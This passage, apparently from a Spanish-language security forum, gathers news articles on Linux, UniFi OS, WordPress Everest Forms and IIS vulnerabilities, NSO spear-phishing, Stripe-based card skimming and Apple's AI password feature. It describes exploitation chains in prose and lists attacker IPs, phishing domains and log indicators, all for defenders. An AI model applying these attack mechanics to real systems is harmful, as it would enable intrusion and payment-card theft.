• Revisar configuraciones relacionadas con User Namespaces.
• Restringir la creación de espacios de nombres no privilegiados cuando sea posible.
• Implementar políticas de hardening del kernel.
• Supervisar actividades sospechosas en entornos multiusuario.
• Auditar infraestructuras basadas en contenedores.

Los sistemas que permiten la ejecución de cargas de trabajo no confiables deben considerarse prioritarios para la actualización.

En fin...

La publicación de exploits funcionales para CVE-2026-23111 convierte a esta vulnerabilidad en una amenaza significativa para organizaciones que aún ejecutan kernels Linux sin actualizar. Aunque el fallo requiere acceso local previo, su capacidad para proporcionar privilegios root y escapar de contenedores lo convierte en una herramienta extremadamente valiosa para atacantes que ya han obtenido una posición inicial dentro de una infraestructura.

La buena noticia es que los parches están disponibles desde febrero de 2026 y, hasta el momento, no existen evidencias públicas de explotación activa en entornos reales. Sin embargo, con múltiples exploits públicos circulando y documentación técnica detallada disponible, el margen de reacción para los administradores se reduce rápidamente. Mantener el kernel actualizado y reforzar las configuraciones de seguridad sigue siendo la mejor defensa frente a este tipo de amenazas.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La batalla entre Meta y NSO Group continúa escalando. La compañía tecnológica anunció que ha detectado y bloqueado una nueva campaña de spear-phishing presuntamente vinculada al fabricante israelí del spyware Pegasus, además de descubrir actividades sospechosas dentro de WhatsApp relacionadas con la creación de cuentas y grupos de prueba utilizados para posibles operaciones de vigilancia.

El hallazgo representa un nuevo capítulo en el largo enfrentamiento entre Meta y NSO Group, una empresa que ha sido objeto de múltiples investigaciones, sanciones y procesos judiciales debido al uso de su software espía contra periodistas, activistas, políticos, defensores de derechos humanos y otras personas consideradas objetivos de alto valor.

Según Meta, los intentos detectados buscaban engañar a usuarios mediante enlaces maliciosos diseñados para redirigirlos fuera de WhatsApp hacia sitios web controlados por atacantes, una técnica similar a campañas de phishing de un solo clic previamente asociadas con NSO Group.

Meta identifica una nueva campaña de spear-phishing

La empresa explicó que los atacantes intentaron utilizar ingeniería social para convencer a las víctimas de abrir enlaces fraudulentos alojados en dominios específicamente preparados para la operación.

Entre los dominios identificados por Meta se encuentran:

• fr24cast[.]com
• Ghazacast[.]com
• ikhwancast[.]com

De acuerdo con los investigadores de la compañía, estos dominios formaban parte de una infraestructura utilizada para atraer a potenciales víctimas hacia páginas externas donde podrían producirse intentos de compromiso de dispositivos.

El spear-phishing es una de las técnicas más utilizadas por grupos de espionaje digital debido a su alta efectividad. A diferencia del phishing tradicional, que se distribuye de forma masiva, el spear-phishing se dirige a individuos específicos mediante mensajes personalizados que aumentan significativamente las probabilidades de éxito.

En campañas vinculadas a spyware avanzado, estos enlaces suelen ser el punto de entrada para desplegar herramientas de vigilancia capaces de acceder a mensajes, correos electrónicos, ubicaciones, llamadas y otros datos sensibles.

NSO Group vuelve al centro de la controversia

La nueva revelación llega apenas un año después de una importante derrota judicial para NSO Group en Estados Unidos.

Un tribunal federal determinó que la empresa israelí había violado la legislación estadounidense al explotar servidores de WhatsApp para distribuir el spyware Pegasus contra más de 1.400 personas en distintos países.

Como resultado, la compañía fue condenada a pagar aproximadamente 168 millones de dólares en daños monetarios.

Este fallo representó una de las decisiones judiciales más importantes contra una empresa dedicada al desarrollo de software de vigilancia comercial y sentó un precedente significativo para futuras acciones legales relacionadas con spyware.

Meta sostiene que las actividades recientemente detectadas podrían constituir una violación directa de la orden judicial permanente emitida contra NSO Group, motivo por el cual planea presentar una solicitud de desacato ante un tribunal federal estadounidense.

La compañía considera que cualquier intento de utilizar WhatsApp o su infraestructura para actividades maliciosas contradice expresamente las restricciones impuestas por la justicia.

Pegasus: uno de los spyware más sofisticados del mundo

El nombre de NSO Group se ha convertido en sinónimo de vigilancia digital avanzada debido a Pegasus, considerado uno de los programas de espionaje más sofisticados jamás desarrollados.

Este spyware ha sido capaz de comprometer dispositivos Android y iPhone mediante múltiples técnicas de explotación, incluyendo vulnerabilidades de día cero (zero-day), ataques de cero clic (zero-click) y campañas de ingeniería social altamente dirigidas.

Una vez instalado, Pegasus puede proporcionar acceso prácticamente completo al dispositivo afectado, permitiendo:

• Interceptar mensajes y correos electrónicos.
• Registrar llamadas telefónicas.
• Activar micrófonos de forma remota.
• Acceder a fotografías y documentos.
• Rastrear la ubicación de la víctima.
• Capturar credenciales y datos sensibles.

Diversas investigaciones internacionales han vinculado el uso de Pegasus con operaciones de vigilancia contra periodistas, opositores políticos, activistas y organizaciones de derechos humanos.

Restricciones impuestas por Estados Unidos

La presión sobre NSO Group no se limita al ámbito judicial.

En 2021, el Departamento de Comercio de Estados Unidos incluyó a la empresa en su lista de entidades restringidas, una medida que limita significativamente su acceso a tecnologías y productos estadounidenses.

Las autoridades estadounidenses justificaron la decisión afirmando que las actividades de la compañía eran contrarias a los intereses de seguridad nacional y política exterior de Estados Unidos.

La inclusión en esta lista supuso un duro golpe para el fabricante de Pegasus y aumentó el escrutinio internacional sobre el sector del spyware comercial.

WhatsApp mantiene el cifrado de extremo a extremo

Ante la preocupación que generan este tipo de campañas, Meta recordó que los mensajes y llamadas personales en WhatsApp continúan protegidos mediante cifrado de extremo a extremo de forma predeterminada.

Esta tecnología garantiza que únicamente el remitente y el destinatario puedan acceder al contenido de las comunicaciones, impidiendo que terceros, incluidos proveedores de servicios, intercepten o lean los mensajes.

No obstante, la compañía enfatiza que los atacantes sofisticados suelen buscar otras vías para comprometer a sus objetivos, como la explotación de vulnerabilidades en dispositivos o el engaño mediante campañas de phishing cuidadosamente diseñadas.

Por ello, mantener una postura de seguridad proactiva sigue siendo fundamental.

Meta recomienda activar la configuración estricta de la cuenta

Como parte de sus medidas de protección, Meta está promoviendo una función avanzada denominada "Configuración estricta de la cuenta", diseñada especialmente para personas que enfrentan un mayor riesgo de ser objetivo de ciberespionaje o ataques avanzados.

Esta modalidad funciona como un sistema de protección reforzada o "lockdown mode", reduciendo la superficie de ataque al limitar determinadas funciones y aumentar los controles de privacidad.

Entre las medidas implementadas se encuentran:

Activación obligatoria de la verificación en dos pasos

La autenticación multifactor añade una capa adicional de protección frente al robo de credenciales y accesos no autorizados.

Desactivación de vistas previas de enlaces

Esta medida reduce la exposición a determinados mecanismos de rastreo y análisis utilizados por atacantes.

Restricción de información visible del perfil

Datos como la foto de perfil, la última conexión, el estado en línea y la información personal quedan limitados únicamente a contactos autorizados.

Control más estricto de grupos

Solo personas conocidas o previamente autorizadas pueden añadir al usuario a nuevos grupos.

Según Meta, estas configuraciones buscan minimizar las oportunidades de ataque utilizadas habitualmente por actores especializados en espionaje digital.

Cómo protegerse frente a campañas de espionaje avanzadas

Los expertos recomiendan adoptar varias medidas de seguridad para reducir el riesgo de convertirse en víctima de ataques sofisticados:

• Mantener WhatsApp actualizado a la última versión disponible.
• Instalar regularmente actualizaciones del sistema operativo.
• Activar la autenticación de dos factores.
• Evitar abrir enlaces sospechosos recibidos por mensajes.
• Revisar cuidadosamente la procedencia de archivos adjuntos.
• Utilizar configuraciones avanzadas de privacidad.
• Reportar actividades sospechosas directamente a WhatsApp.

Estas prácticas son especialmente importantes para periodistas, funcionarios públicos, investigadores, activistas y profesionales que manejan información sensible.

En fin...

La detección de nuevos intentos de spear-phishing vinculados a NSO Group demuestra que las amenazas asociadas al spyware comercial continúan evolucionando y siguen representando un riesgo significativo para usuarios de alto perfil en todo el mundo.

Mientras Meta intensifica sus acciones legales y técnicas contra los responsables de estas campañas, los usuarios deben adoptar medidas de seguridad adicionales para proteger sus cuentas y dispositivos. La combinación de cifrado de extremo a extremo, autenticación multifactor y configuraciones avanzadas de privacidad constituye actualmente una de las mejores defensas frente a las crecientes amenazas de espionaje digital y vigilancia sofisticada.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La seguridad de las contraseñas ha sido durante años uno de los mayores desafíos para usuarios y empresas. A pesar de las constantes recomendaciones de expertos en ciberseguridad, millones de personas continúan utilizando credenciales débiles, repetidas o comprometidas, aumentando significativamente el riesgo de robo de cuentas y filtraciones de datos.

Durante la WWDC 2026, Apple presentó una importante evolución de su ecosistema de seguridad al anunciar una nueva capacidad impulsada por Apple Intelligence que permitirá corregir automáticamente contraseñas débiles o comprometidas. Esta innovación busca reducir la dependencia del usuario en la gestión manual de credenciales y fortalecer la protección de las cuentas digitales mediante inteligencia artificial avanzada.

La nueva función llegará junto con iOS 27 y promete transformar la forma en que los usuarios administran sus contraseñas en Safari y en la aplicación integrada Passwords, convirtiendo al gestor de credenciales de Apple en una herramienta mucho más inteligente, proactiva y segura.

Apple da un paso más allá en la gestión de contraseñas

Hasta ahora, Safari y la aplicación Passwords ofrecían mecanismos de protección enfocados principalmente en la detección de riesgos. Cuando un usuario creaba una nueva cuenta o introducía una contraseña poco segura, el sistema podía advertir sobre diversos problemas de seguridad.

Entre las funciones actuales destacan:

• Detección de contraseñas débiles.
• Identificación de credenciales reutilizadas.
• Alertas sobre contraseñas comprometidas en filtraciones de datos.
• Generación automática de contraseñas seguras.
• Almacenamiento cifrado de credenciales.

Sin embargo, la responsabilidad final de modificar una contraseña vulnerable recaía completamente sobre el usuario.

Con la llegada de Apple Intelligence, esta dinámica cambia radicalmente. En lugar de limitarse a generar advertencias, el sistema podrá actuar de manera autónoma para actualizar determinadas credenciales cuando detecte riesgos de seguridad.

Según explicó Apple durante la conferencia, el gestor de contraseñas integrado será capaz de operar de forma "agente" o agentic, utilizando inteligencia artificial para tomar decisiones basadas en el contexto y el comportamiento del usuario.

¿Cómo funcionará la corrección automática de contraseñas?

La nueva tecnología permitirá que Safari y la aplicación Passwords identifiquen cuentas compatibles donde las contraseñas necesiten ser reemplazadas por credenciales más robustas.

Cuando se detecte una contraseña débil, reutilizada o comprometida, Apple Intelligence podrá intervenir y actualizar automáticamente la cuenta con una contraseña más segura, reduciendo significativamente la exposición a ataques de fuerza bruta, relleno de credenciales (credential stuffing) y accesos no autorizados.

Este enfoque representa un cambio importante en la filosofía tradicional de gestión de contraseñas.

Hasta ahora, los gestores de credenciales actuaban principalmente como herramientas de almacenamiento y generación. Con Apple Intelligence, el sistema pasa a desempeñar un papel activo en la protección de las cuentas digitales.

Aunque Apple no ha revelado todos los detalles técnicos sobre el proceso, la compañía confirmó que la funcionalidad estará integrada profundamente en Safari y en el ecosistema de autenticación de iOS 27.

Apple Intelligence y la apuesta por la IA centrada en la privacidad

Uno de los aspectos que más interés ha generado es cómo Apple planea implementar estas capacidades sin comprometer la privacidad de los usuarios.

La compañía insiste en que la arquitectura de Apple Intelligence ha sido diseñada desde el principio con un enfoque centrado en la protección de los datos personales.

Según Apple, las nuevas funciones están impulsadas por la última generación de modelos Apple Foundation, una familia de modelos de inteligencia artificial desarrollados específicamente para integrarse en sus plataformas.

Estos modelos han sido optimizados para funcionar tanto en dispositivos locales como en servidores especializados mediante una infraestructura denominada Private Cloud Compute.

El objetivo es ofrecer capacidades avanzadas de inteligencia artificial sin sacrificar la privacidad que caracteriza al ecosistema de Apple.

El papel de los modelos Foundation y la colaboración tecnológica

Apple también reveló que el desarrollo de sus modelos fundacionales incluyó trabajo conjunto con tecnologías derivadas del ecosistema de inteligencia artificial de Google.

La empresa utilizó modelos Gemini como referencia para perfeccionar determinadas capacidades de sus propios sistemas, integrándolos posteriormente en Apple Intelligence de manera nativa.

Este enfoque híbrido permite a Apple aprovechar avances significativos en aprendizaje automático mientras mantiene el control sobre la experiencia del usuario y las medidas de privacidad implementadas en sus dispositivos.

La compañía asegura que los modelos Foundation han sido diseñados específicamente para responder a las necesidades de seguridad, rendimiento y eficiencia energética de sus plataformas.

Private Cloud Compute: seguridad avanzada para tareas en la nube

Aunque gran parte de las funciones de Apple Intelligence se ejecutarán directamente en los dispositivos compatibles, algunas operaciones más complejas requerirán procesamiento adicional en la nube.

Para ello, Apple utilizará Private Cloud Compute, una infraestructura diseñada para ofrecer capacidades de computación avanzadas manteniendo estrictos estándares de privacidad.

Según la compañía, cuando una solicitud se procesa mediante esta tecnología:

• Los datos personales no se almacenan.
• La información no queda accesible para Apple.
• Los datos no son compartidos con terceros.
• Cada solicitud se procesa bajo estrictos controles de seguridad.
• La información se elimina una vez completada la operación.

Este modelo busca responder a una de las principales preocupaciones de los usuarios respecto a la inteligencia artificial moderna: el tratamiento de información sensible fuera del dispositivo.

Beneficios para usuarios y empresas

La incorporación de un gestor de contraseñas inteligente puede aportar importantes ventajas tanto a consumidores como a organizaciones.

Entre los principales beneficios destacan:

Reducción del riesgo de compromiso de cuentas

Las credenciales débiles siguen siendo una de las principales causas de brechas de seguridad. Automatizar su corrección puede reducir significativamente la superficie de ataque.

Menor dependencia del usuario

Muchos usuarios ignoran las advertencias de seguridad o posponen la actualización de contraseñas comprometidas. La automatización elimina este problema.

Protección frente a filtraciones de datos

Cuando una contraseña aparece en una brecha de seguridad conocida, el sistema podrá actuar rápidamente para sustituirla por una alternativa más segura.

Mejora de las prácticas de seguridad

La implementación de contraseñas únicas y complejas se vuelve mucho más sencilla para los usuarios menos experimentados.

Disponibilidad de la nueva función

Apple confirmó que las capacidades avanzadas de Apple Intelligence, incluyendo la corrección automática de contraseñas, estarán disponibles con el lanzamiento oficial de iOS 27 a finales de este año.

No obstante, los desarrolladores interesados en probar estas características pueden acceder antes mediante el Programa de Desarrolladores de Apple, donde ya se encuentra disponible la versión beta del sistema operativo.

Como suele ocurrir con las versiones preliminares, algunas funciones podrían evolucionar antes de llegar al lanzamiento final.

En fin...

La nueva función de corrección automática de contraseñas impulsada por Apple Intelligence representa uno de los avances más relevantes en materia de seguridad para el ecosistema Apple. Al pasar de un modelo reactivo basado en advertencias a un enfoque proactivo capaz de actuar de forma autónoma, Apple busca reducir uno de los riesgos más comunes en la seguridad digital moderna.

Con iOS 27, Safari y la aplicación Passwords no solo detectarán credenciales inseguras, sino que podrán reemplazarlas automáticamente por opciones más robustas. Combinado con la infraestructura Private Cloud Compute y los modelos Apple Foundation, este avance refuerza la estrategia de Apple de integrar inteligencia artificial avanzada sin renunciar a la privacidad y protección de los datos de sus usuarios.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La seguridad de las infraestructuras de red empresariales vuelve a estar en el punto de mira tras la divulgación de una peligrosa cadena de vulnerabilidades que afecta a UniFi OS Server, la plataforma de gestión desarrollada por Ubiquiti. Investigadores de seguridad han demostrado que tres fallos críticos pueden combinarse para lograr ejecución remota de código (RCE) con privilegios root sin necesidad de autenticación, exponiendo potencialmente redes corporativas completas a ataques devastadores.

Las vulnerabilidades, identificadas como CVE-2026-34908, CVE-2026-34909 y CVE-2026-34910, fueron corregidas por el fabricante en mayo y afectan a UniFi OS Server versión 5.0.6 y anteriores. Aunque Ubiquiti asignó la máxima gravedad a los tres problemas de seguridad, inicialmente no se detalló que podían encadenarse para conseguir el control total del sistema.

Tres vulnerabilidades críticas que pueden comprometer toda la infraestructura

Los investigadores de Bishop Fox analizaron en profundidad los fallos y validaron una cadena de ataque completa en una instalación activa de UniFi OS Server 5.0.6. El resultado fue alarmante: un atacante remoto puede obtener acceso root sin credenciales, sin interacción del usuario y sin acceso previo al entorno comprometido.

Las vulnerabilidades involucradas son:

CVE-2026-34908: Control de acceso inadecuado

Este fallo permite realizar cambios no autorizados en sistemas vulnerables debido a errores en los mecanismos de validación de acceso. La vulnerabilidad constituye el primer eslabón de la cadena de ataque.

CVE-2026-34909: Vulnerabilidad de path traversal

La segunda falla permite realizar ataques de recorrido de directorios o path traversal, facilitando el acceso a archivos ubicados en el sistema operativo subyacente. Este tipo de vulnerabilidades suele ser especialmente peligrosa porque puede exponer información sensible y ayudar a los atacantes a avanzar dentro del sistema.

CVE-2026-34910: Inyección de comandos

La tercera vulnerabilidad permite la ejecución de comandos arbitrarios mediante una falla de inyección de comandos. Una vez alcanzado el punto vulnerable, los atacantes pueden ejecutar instrucciones directamente sobre el servidor afectado.

La combinación de estos tres errores de seguridad convierte un acceso externo aparentemente limitado en una toma completa del sistema.

Cómo funciona la cadena de explotación

Según el análisis técnico realizado por Bishop Fox, la causa principal del bypass de autenticación reside en una discrepancia entre la forma en que UniFi OS procesa las solicitudes entrantes y cómo el servidor web Nginx las enruta internamente.

El componente encargado de la autenticación evalúa la URI original recibida en la solicitud, mientras que Nginx trabaja sobre una versión normalizada de esa misma URI. Esta diferencia permite a los atacantes construir peticiones especialmente manipuladas que aparentan dirigirse a rutas públicas exentas de autenticación, pero que tras la normalización terminan accediendo a recursos internos protegidos.

En términos prácticos, el sistema interpreta la solicitud de dos maneras diferentes, generando una brecha que puede aprovecharse para evadir completamente los controles de acceso.

Una vez superada la autenticación, los atacantes pueden dirigirse a un endpoint relacionado con la actualización de paquetes del sistema. Allí entra en juego CVE-2026-34910, que permite introducir comandos maliciosos mediante parámetros insuficientemente validados.

Escalada de privilegios hasta root

Uno de los aspectos más preocupantes del descubrimiento es que la obtención de privilegios root resulta extremadamente sencilla.

Aunque los comandos inyectados inicialmente se ejecutan bajo una cuenta de servicio, los investigadores descubrieron que dicha cuenta posee permisos sudo sin contraseña para diversos binarios críticos del sistema. Como consecuencia, la transición desde una ejecución limitada hasta el control total del servidor puede realizarse prácticamente de forma inmediata.

Los expertos destacan que obtener acceso root en un servidor UniFi OS tiene implicaciones mucho más amplias que comprometer un simple servidor Linux.

UniFi OS suele actuar como el centro de administración de toda la infraestructura tecnológica de una organización, incluyendo:

• Equipos de red.
• Puntos de acceso inalámbricos.
• Cámaras de videovigilancia.
• Sistemas de control de acceso físico.
• Identidades y configuraciones asociadas.
• Servicios de gestión centralizada.

Por ello, una intrusión exitosa podría traducirse en el control completo de activos críticos de la empresa.

Herramienta gratuita para detectar sistemas vulnerables

Con el objetivo de ayudar a los administradores y equipos de seguridad, Bishop Fox publicó una herramienta gratuita de detección diseñada específicamente para identificar servidores vulnerables a esta cadena de ejecución remota de código.

El script realiza una comprobación segura enviando solicitudes especialmente diseñadas para alcanzar el código vulnerable sin ejecutar comandos peligrosos. Posteriormente clasifica el sistema analizado en una de las siguientes categorías:

• Vulnerable.
• Parcheado.
• No afectado.
• Resultado inconcluso.

Sin embargo, los investigadores advierten que esta herramienta únicamente permite determinar si una instancia es vulnerable en el momento del análisis. No está diseñada para detectar compromisos previos, actividad maliciosa histórica ni mecanismos de persistencia instalados por atacantes.

Dificultades para detectar ataques exitosos

Uno de los mayores desafíos para los equipos de respuesta a incidentes es que la explotación de esta cadena no requiere autenticación.

Al no existir intentos de inicio de sesión ni credenciales comprometidas, los registros tradicionales de acceso pueden no mostrar indicadores claros de actividad maliciosa.

Por esta razón, los especialistas recomiendan revisar cuidadosamente los registros en busca de patrones sospechosos relacionados con:

• Solicitudes que incluyan la ruta /api/auth/validate-sso/.
• Accesos al endpoint ucs/update/latest_package.
• Procesos hijos inusuales generados por ucs-update.
• Ejecuciones inesperadas de comandos sudo.
• Actividad anómala asociada a cuentas de servicio.

La monitorización continua de estos indicadores puede ayudar a identificar intentos de explotación o actividades posteriores al compromiso.

Actualizaciones disponibles y recomendaciones de mitigación

Bishop Fox confirmó que la cadena completa de ataque deja de funcionar en UniFi OS Server 5.0.8, versión que incorpora las correcciones necesarias para neutralizar los tres fallos de seguridad.

Por este motivo, la recomendación principal para organizaciones y administradores es actualizar inmediatamente a la versión 5.0.8 o superior.

No obstante, los expertos subrayan que actualizar no siempre es suficiente. Antes de considerar seguro un entorno, resulta fundamental verificar que el sistema no haya sido comprometido previamente.

Entre las mejores prácticas recomendadas se encuentran:

• Aplicar todas las actualizaciones disponibles de UniFi OS.
• Revisar registros de actividad sospechosa.
• Auditar cuentas y permisos administrativos.
• Analizar posibles mecanismos de persistencia.
• Supervisar procesos relacionados con actualizaciones del sistema.
• Implementar segmentación de red cuando sea posible.
• Restringir la exposición de interfaces administrativas a Internet.

En fin...

La cadena formada por CVE-2026-34908, CVE-2026-34909 y CVE-2026-34910 representa una de las amenazas más graves descubiertas recientemente para UniFi OS Server. La posibilidad de obtener acceso root remoto sin autenticación convierte estas vulnerabilidades en un riesgo crítico para organizaciones que dependen de la plataforma de gestión de Ubiquiti.

Dado que UniFi OS suele administrar componentes esenciales de la infraestructura tecnológica, una explotación exitosa puede derivar en la toma de control completa de redes, dispositivos de seguridad física y sistemas corporativos. Las organizaciones que aún ejecuten versiones vulnerables deben priorizar la actualización inmediata y realizar una evaluación exhaustiva para descartar posibles compromisos previos.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los ciberdelincuentes están explotando activamente una vulnerabilidad crítica de ejecución remota de código (RCE) en Everest Forms Pro, un popular complemento de WordPress utilizado por miles de sitios web para la creación y gestión de formularios. La falla, identificada como CVE-2026-3300, posee una puntuación CVSS de 9,8 sobre 10 y permite a atacantes no autenticados ejecutar código PHP arbitrario en servidores vulnerables, lo que puede derivar en el control total del sitio comprometido.

La amenaza ha despertado una gran preocupación dentro de la comunidad de seguridad debido a que la explotación no requiere autenticación previa y puede ser utilizada para crear cuentas administrativas fraudulentas, instalar puertas traseras, desplegar web shells y mantener acceso persistente a largo plazo.

Según investigadores de Wordfence, la vulnerabilidad ya está siendo explotada de forma activa en Internet, con decenas de miles de intentos de ataque registrados desde abril de 2026.

¿Qué es la vulnerabilidad CVE-2026-3300?

La falla afecta a todas las versiones de Everest Forms Pro hasta la versión 1.9.12 incluida. Los desarrolladores corrigieron el problema mediante la publicación de la versión 1.9.13 el pasado 18 de marzo de 2026.

De acuerdo con el análisis técnico de Wordfence, el origen del problema se encuentra en la función process_filter() del complemento Calculation Addon, responsable de procesar cálculos complejos dentro de formularios dinámicos.

El error ocurre porque los datos enviados por los usuarios son concatenados directamente dentro de una cadena de código PHP que posteriormente es ejecutada mediante la función eval() sin una validación adecuada.

Aunque el complemento utiliza sanitize_text_field() para limpiar las entradas, esta función no elimina correctamente determinados caracteres peligrosos utilizados en el contexto de ejecución PHP, incluyendo comillas simples y otros elementos que permiten la inyección de código.

Como resultado, un atacante puede enviar datos especialmente diseñados a través de campos de formularios como:

• Campos de texto.
• Direcciones de correo electrónico.
• Campos URL.
• Menús desplegables.
• Botones de selección (radio).

Cuando el formulario utiliza la función de "Cálculo Complejo", estos valores maliciosos pueden ejecutarse directamente en el servidor.

Ejecución remota de código y control total del sitio

La gravedad de CVE-2026-3300 radica en que permite la ejecución remota de código sin necesidad de autenticación.

Una vez explotada la vulnerabilidad, los atacantes pueden ejecutar comandos PHP arbitrarios con los privilegios del servidor web, lo que abre la puerta a múltiples escenarios de compromiso.

Entre las acciones más comunes observadas por los investigadores destacan:

• Creación de nuevas cuentas de administrador.
• Instalación de puertas traseras persistentes.
• Despliegue de web shells.
• Robo de bases de datos.
• Manipulación de contenido web.
• Instalación de malware adicional.
• Movimiento lateral dentro del servidor.
• Persistencia prolongada en la infraestructura comprometida.

En muchos casos, el sitio web afectado puede quedar completamente bajo control del atacante en cuestión de minutos.

Más de 29.000 intentos de explotación detectados

Wordfence confirmó que la actividad maliciosa relacionada con CVE-2026-3300 comenzó a observarse activamente desde el 13 de abril de 2026.

Desde entonces, los sistemas de protección de la compañía han bloqueado más de 29.300 intentos de explotación dirigidos a sitios WordPress vulnerables.

Aunque el volumen total ya resulta preocupante, los investigadores indicaron que la actividad continúa activa. Solo durante las últimas 24 horas se registraron al menos 16 nuevos intentos de explotación.

La carga útil más frecuente observada en estos ataques tiene como objetivo crear una cuenta administrativa fraudulenta con el nombre:

diksimarina

Utilizando la dirección de correo electrónico:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La creación de cuentas administrativas es una táctica habitual utilizada por los atacantes para mantener acceso incluso después de que la vulnerabilidad original haya sido corregida.

Direcciones IP vinculadas a los ataques

Wordfence también publicó varias direcciones IP asociadas con actividades de explotación detectadas recientemente.

Entre las direcciones observadas se encuentran:

• 202.56.2.126
• 209.146.60.26
• 15.235.166.18
• 2402:1f00:8000:800::40db
• 185.78.165.153

Los administradores de WordPress pueden utilizar esta información como parte de sus procesos de monitoreo y análisis de registros para identificar posibles intentos de intrusión.

No obstante, los expertos advierten que los atacantes suelen utilizar infraestructuras distribuidas y servidores comprometidos, por lo que bloquear únicamente estas direcciones no garantiza protección completa.

Sansec descubre campañas de skimming que utilizan Stripe como infraestructura de comando y control

Mientras la comunidad de WordPress enfrenta la amenaza de CVE-2026-3300, investigadores de Sansec han descubierto una campaña independiente de robo de tarjetas de crédito que utiliza servicios legítimos de Stripe como infraestructura encubierta de comando y control (C2).

El objetivo principal de los atacantes consiste en aprovechar la confianza que los comercios electrónicos depositan en servicios ampliamente utilizados como:

• Stripe.
• Google Tag Manager.
• Google Firestore.

Los investigadores explican que muchos sitios de comercio electrónico permiten automáticamente conexiones hacia estos servicios debido a sus políticas de seguridad de contenido (CSP), lo que convierte a estas plataformas en canales ideales para ocultar actividades maliciosas.

Cómo funciona el ataque utilizando Stripe

La campaña detectada por Sansec emplea código malicioso cargado a través de Google Tag Manager para infectar tiendas basadas en Magento y Adobe Commerce.

Una vez activo, el malware descarga un skimmer oculto almacenado dentro de los metadatos de una cuenta legítima de Stripe.

Cuando los usuarios introducen información de pago durante el proceso de compra, el malware recopila:

• Números de tarjetas bancarias.
• Direcciones de facturación.
• Correos electrónicos.
• Números telefónicos.
• Datos de pago adicionales.

Toda esta información es almacenada temporalmente en localStorage y posteriormente enviada a la cuenta de Stripe controlada por los atacantes.

De esta forma, los delincuentes convierten la infraestructura de Stripe en una base de datos gratuita para almacenar tarjetas robadas sin necesidad de desplegar servidores propios.

GorgonAgora: más de 5.700 tiendas falsas roban tarjetas de crédito

Los hallazgos de Sansec también coinciden con una operación masiva denominada GorgonAgora.

Esta campaña ha creado al menos 5.714 tiendas fraudulentas bajo dominios .shop que se hacen pasar por marcas mundialmente reconocidas.

Entre las marcas suplantadas destacan:

• Starbucks.
• Ford.
• Sony.
• Mattel.
• Hasbro.
• Lego.
• Disney.
• Toyota.

Todas estas tiendas falsas utilizan una infraestructura basada en Medusa.js junto con un sistema de pago fraudulento que simula la apariencia de Stripe.

Los datos robados son enviados a un servidor centralizado ubicado en Moldavia mediante conexiones WebSocket cifradas utilizando AES-256-GCM.

Lo más preocupante es que la operación también incorpora un mecanismo avanzado para gestionar desafíos 3D Secure en tiempo real. Esto permite a los atacantes completar transacciones fraudulentas sin despertar sospechas en las víctimas ni en las entidades financieras.

La amenaza contra WordPress y el comercio electrónico sigue creciendo

La explotación activa de CVE-2026-3300 y las campañas avanzadas de skimming detectadas por Sansec demuestran que los ciberdelincuentes continúan ampliando sus capacidades para comprometer plataformas web y robar información sensible.

Para los administradores de WordPress, la prioridad inmediata debe ser actualizar Everest Forms Pro a la versión 1.9.13 o superior, revisar la existencia de cuentas administrativas sospechosas y analizar registros en busca de actividad maliciosa.

Al mismo tiempo, las organizaciones de comercio electrónico deben reforzar el monitoreo de scripts externos, auditar sus configuraciones de seguridad de contenido y supervisar continuamente cualquier modificación no autorizada en sus procesos de pago.

La combinación de vulnerabilidades críticas, robo de credenciales y campañas de skimming cada vez más sofisticadas confirma que la seguridad web seguirá siendo uno de los principales desafíos para empresas y administradores durante 2026.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Investigadores de ciberseguridad han revelado la existencia de un nuevo clúster de amenazas denominado OP-512, una operación de ciberespionaje previamente desconocida que ha sido observada comprometiendo servidores Microsoft Internet Information Services (IIS) mediante un sofisticado framework de web shells diseñado para mantener acceso persistente, evadir herramientas de detección y facilitar actividades de inteligencia a largo plazo.

De acuerdo con un informe publicado por la firma de seguridad ReliaQuest, la actividad ha sido atribuida con un nivel de confianza moderado a alto a actores alineados con intereses estratégicos de China. Aunque no existen coincidencias directas con grupos de amenazas previamente identificados, los investigadores consideran que la operación comparte características operativas y objetivos consistentes con campañas de espionaje cibernético vinculadas al ecosistema de amenazas chino.

OP-512 se suma a la creciente ola de ataques contra servidores IIS

Los servidores Microsoft IIS se han convertido en uno de los objetivos preferidos para múltiples grupos de amenazas relacionados con China durante los últimos meses.

Según ReliaQuest, OP-512 es el cuarto clúster de amenazas asociado con actividades de espionaje chino que centra sus operaciones en servidores IIS durante el último año. Anteriormente, investigadores habían documentado campañas similares relacionadas con grupos como CL-STA-0048, DragonRank y GhostRedirector.

La tendencia se ha intensificado recientemente. Hace apenas unas semanas, investigadores de Cisco Talos revelaron que varios grupos de habla china estaban compartiendo una variante de malware denominada BadIIS para comprometer servidores web empresariales.

Asimismo, campañas atribuidas a SHADOW-EARTH-053 también han utilizado servidores IIS vulnerables para infiltrarse en organismos gubernamentales, entidades de defensa y organizaciones estratégicas ubicadas en el sur, este y sudeste asiático.

Este patrón demuestra que los servidores IIS continúan siendo una pieza clave dentro de las operaciones de ciberespionaje impulsadas por actores estatales y grupos patrocinados por gobiernos.

Un framework de web shells diseñado para evadir la detección

Uno de los aspectos más destacados de OP-512 es el desarrollo de un framework web shell completamente personalizado.

A diferencia de muchas campañas que reutilizan herramientas ampliamente conocidas, este grupo emplea un conjunto exclusivo de tres web shells diseñados específicamente para proporcionar acceso remoto a sistemas comprometidos mientras dificultan significativamente las tareas de detección e investigación forense.

Los investigadores explican que cada implementación es generada de forma única para cada víctima, lo que reduce la eficacia de los sistemas de detección basados en firmas tradicionales.

Además, el acceso a las herramientas desplegadas está protegido mediante mecanismos criptográficos que limitan su utilización exclusivamente a los operadores del grupo atacante.

Otra característica particularmente sofisticada es la incorporación de capacidades de autoinforme. Una vez comprometido un servidor, los web shells notifican automáticamente a la infraestructura de mando y control del atacante, permitiendo gestionar múltiples víctimas de forma centralizada y a gran escala.

Timetomping: la técnica utilizada para ocultar la intrusión

El framework desarrollado por OP-512 incorpora técnicas avanzadas de evasión forense, incluyendo el uso de timetomping.

